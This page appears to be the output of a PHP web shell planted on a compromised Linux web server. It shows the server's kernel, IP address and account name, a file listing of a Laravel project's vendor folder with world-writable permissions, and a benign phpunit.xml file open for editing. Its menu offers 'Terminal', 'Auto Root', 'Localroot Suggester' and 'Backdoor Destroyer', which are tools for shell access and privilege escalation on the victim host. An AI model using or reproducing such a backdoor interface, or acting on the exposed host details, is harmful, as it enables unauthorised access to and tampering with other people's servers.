Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
vendor /
laravel /
prompts /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
LICENSE.md
1.05
KB
-rw-rw-rw-
2025-02-11 02:34
README.md
1.83
KB
-rw-rw-rw-
2025-02-11 02:34
composer.json
1.25
KB
-rw-rw-rw-
2025-02-11 02:34
phpunit.xml
573
B
-rw-rw-rw-
2025-02-11 02:34
Save
Rename
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/10.2/phpunit.xsd" bootstrap="vendor/autoload.php" colors="true" backupStaticProperties="true" failOnWarning="true"> <testsuites> <testsuite name="Test Suite"> <directory suffix="Test.php">./tests</directory> </testsuite> </testsuites> <source> <include> <directory suffix=".php">./app</directory> <directory suffix=".php">./src</directory> </include> </source> </phpunit>